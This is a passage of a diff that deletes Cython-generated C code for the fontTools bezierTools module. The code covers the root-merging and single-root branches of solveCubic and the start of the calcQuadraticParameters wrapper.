__pyx_t_4 = __pyx_t_7; - __pyx_L8_bool_binop_done:; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":912 - * # Merge roots that are close-enough - * if x1 - x0 < epsilon and x2 - x1 < epsilon: - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) # <<<<<<<<<<<<<< - * elif x1 - x0 < epsilon: - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - */ - __pyx_t_3 = PyNumber_Add(__pyx_v_x0, __pyx_v_x1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyNumber_Add(__pyx_t_3, __pyx_v_x2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyTuple_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_3)) __PYX_ERR(0, 912, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_1)) __PYX_ERR(0, 912, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_6, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_INCREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_1); - __Pyx_INCREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_1); - __Pyx_INCREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_1); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":911 - * x0, x1, x2 = sorted([x0, x1, x2]) - * # Merge roots that are 
close-enough - * if x1 - x0 < epsilon and x2 - x1 < epsilon: # <<<<<<<<<<<<<< - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: - */ - goto __pyx_L7; - } - - /* "fontTools/misc/bezierTools.py":913 - * if x1 - x0 < epsilon and x2 - x1 < epsilon: - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: # <<<<<<<<<<<<<< - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x1, __pyx_v_x0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 913, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 913, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_t_6, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 913, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 913, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":914 - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) # <<<<<<<<<<<<<< - * x2 = round(x2, epsilonDigits) - * elif x2 - x1 < epsilon: - */ - __pyx_t_3 = PyNumber_Add(__pyx_v_x0, __pyx_v_x1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_3, __pyx_float_2_0, 2.0, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyTuple_New(2); if 
(unlikely(!__pyx_t_1)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_6)) __PYX_ERR(0, 914, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 914, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_1, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_INCREF(__pyx_t_3); - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_3); - __Pyx_INCREF(__pyx_t_3); - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_3); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":915 - * elif x1 - x0 < epsilon: - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) # <<<<<<<<<<<<<< - * elif x2 - x1 < epsilon: - * x0 = round(x0, epsilonDigits) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 915, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 915, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x2)) __PYX_ERR(0, 915, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 915, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_1, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 915, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":913 - * if x1 - x0 < epsilon and x2 - x1 < epsilon: - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: # <<<<<<<<<<<<<< - * x0 = 
x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) - */ - goto __pyx_L7; - } - - /* "fontTools/misc/bezierTools.py":916 - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) - * elif x2 - x1 < epsilon: # <<<<<<<<<<<<<< - * x0 = round(x0, epsilonDigits) - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) - */ - __pyx_t_3 = PyNumber_Subtract(__pyx_v_x2, __pyx_v_x1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 916, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 916, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyObject_RichCompare(__pyx_t_3, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 916, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 916, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":917 - * x2 = round(x2, epsilonDigits) - * elif x2 - x1 < epsilon: - * x0 = round(x0, epsilonDigits) # <<<<<<<<<<<<<< - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) - * else: - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 917, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 917, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x0); - __Pyx_GIVEREF(__pyx_v_x0); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x0)) __PYX_ERR(0, 917, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_6)) __PYX_ERR(0, 917, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_1, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 917, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_6); - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":918 - * elif x2 - x1 < epsilon: - * x0 = round(x0, epsilonDigits) - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) # <<<<<<<<<<<<<< - * else: - * x0 = round(x0, epsilonDigits) - */ - __pyx_t_6 = PyNumber_Add(__pyx_v_x1, __pyx_v_x2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_6, __pyx_float_2_0, 2.0, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 918, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6)) __PYX_ERR(0, 918, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_INCREF(__pyx_t_6); - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_6); - __Pyx_INCREF(__pyx_t_6); - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_6); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":916 - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) - * elif x2 - x1 < epsilon: # <<<<<<<<<<<<<< - * x0 = round(x0, epsilonDigits) - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) - */ - goto __pyx_L7; - } - - /* "fontTools/misc/bezierTools.py":920 - * x1 = x2 = round((x1 + x2) / 2.0, 
epsilonDigits) - * else: - * x0 = round(x0, epsilonDigits) # <<<<<<<<<<<<<< - * x1 = round(x1, epsilonDigits) - * x2 = round(x2, epsilonDigits) - */ - /*else*/ { - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 920, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 920, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x0); - __Pyx_GIVEREF(__pyx_v_x0); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x0)) __PYX_ERR(0, 920, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6)) __PYX_ERR(0, 920, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 920, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_6); - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":921 - * else: - * x0 = round(x0, epsilonDigits) - * x1 = round(x1, epsilonDigits) # <<<<<<<<<<<<<< - * x2 = round(x2, epsilonDigits) - * return [x0, x1, x2] - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 921, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 921, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x1)) __PYX_ERR(0, 921, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6)) __PYX_ERR(0, 921, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 921, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_6); - __pyx_t_6 = 0; - - /* 
"fontTools/misc/bezierTools.py":922 - * x0 = round(x0, epsilonDigits) - * x1 = round(x1, epsilonDigits) - * x2 = round(x2, epsilonDigits) # <<<<<<<<<<<<<< - * return [x0, x1, x2] - * else: - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 922, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 922, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x2)) __PYX_ERR(0, 922, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6)) __PYX_ERR(0, 922, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 922, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_6); - __pyx_t_6 = 0; - } - __pyx_L7:; - - /* "fontTools/misc/bezierTools.py":923 - * x1 = round(x1, epsilonDigits) - * x2 = round(x2, epsilonDigits) - * return [x0, x1, x2] # <<<<<<<<<<<<<< - * else: - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_6 = PyList_New(3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 923, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_INCREF(__pyx_v_x0); - __Pyx_GIVEREF(__pyx_v_x0); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 0, __pyx_v_x0)) __PYX_ERR(0, 923, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 1, __pyx_v_x1)) __PYX_ERR(0, 923, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 2, __pyx_v_x2)) __PYX_ERR(0, 923, __pyx_L1_error); - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":901 - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] - * elif R2_Q3 <= 
epsilon * 0.5: # <<<<<<<<<<<<<< - * # The epsilon * .5 above ensures that Q3 is not zero. - * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) - */ - } - - /* "fontTools/misc/bezierTools.py":925 - * return [x0, x1, x2] - * else: - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) # <<<<<<<<<<<<<< - * x = x + Q / x - * if R >= 0.0: - */ - /*else*/ { - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_R2_Q3}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = __Pyx_PyNumber_Absolute(__pyx_v_R); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyNumber_Add(__pyx_t_6, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyFloat_FromDouble((1.0 / 3.0)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyNumber_Power2(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 925, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_x = __pyx_t_6; - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":926 - * else: 
- * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) - * x = x + Q / x # <<<<<<<<<<<<<< - * if R >= 0.0: - * x = -x - */ - __pyx_t_6 = __Pyx_PyNumber_Divide(__pyx_v_Q, __pyx_v_x); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 926, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyNumber_Add(__pyx_v_x, __pyx_t_6); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 926, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF_SET(__pyx_v_x, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":927 - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) - * x = x + Q / x - * if R >= 0.0: # <<<<<<<<<<<<<< - * x = -x - * x = round(x - a1 / 3.0, epsilonDigits) - */ - __pyx_t_3 = PyObject_RichCompare(__pyx_v_R, __pyx_float_0_0, Py_GE); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 927, __pyx_L1_error) - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 927, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":928 - * x = x + Q / x - * if R >= 0.0: - * x = -x # <<<<<<<<<<<<<< - * x = round(x - a1 / 3.0, epsilonDigits) - * return [x] - */ - __pyx_t_3 = PyNumber_Negative(__pyx_v_x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 928, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF_SET(__pyx_v_x, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":927 - * x = pow(sqrt(R2_Q3) + abs(R), 1 / 3.0) - * x = x + Q / x - * if R >= 0.0: # <<<<<<<<<<<<<< - * x = -x - * x = round(x - a1 / 3.0, epsilonDigits) - */ - } - - /* "fontTools/misc/bezierTools.py":929 - * if R >= 0.0: - * x = -x - * x = round(x - a1 / 3.0, epsilonDigits) # <<<<<<<<<<<<<< - * return [x] - * - */ - __pyx_t_3 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_a1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = PyNumber_Subtract(__pyx_v_x, __pyx_t_3); if (unlikely(!__pyx_t_6)) 
__PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_6)) __PYX_ERR(0, 929, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 929, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_1, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 929, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF_SET(__pyx_v_x, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":930 - * x = -x - * x = round(x - a1 / 3.0, epsilonDigits) - * return [x] # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 930, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_v_x)) __PYX_ERR(0, 930, __pyx_L1_error); - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":841 - * - * - * def solveCubic(a, b, c, d): # <<<<<<<<<<<<<< - * """Solve a cubic equation. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("fontTools.misc.bezierTools.solveCubic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a1); - __Pyx_XDECREF(__pyx_v_a2); - __Pyx_XDECREF(__pyx_v_a3); - __Pyx_XDECREF(__pyx_v_Q); - __Pyx_XDECREF(__pyx_v_R); - __Pyx_XDECREF(__pyx_v_R2); - __Pyx_XDECREF(__pyx_v_Q3); - __Pyx_XDECREF(__pyx_v_R2_Q3); - __Pyx_XDECREF(__pyx_v_x); - __Pyx_XDECREF(__pyx_v_theta); - __Pyx_XDECREF(__pyx_v_rQ2); - __Pyx_XDECREF(__pyx_v_a1_3); - __Pyx_XDECREF(__pyx_v_x0); - __Pyx_XDECREF(__pyx_v_x1); - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":938 - * - * - * def calcQuadraticParameters(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_51calcQuadraticParameters(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_50calcQuadraticParameters, "calcQuadraticParameters(pt1, pt2, pt3)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_51calcQuadraticParameters = {"calcQuadraticParameters", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_51calcQuadraticParameters, 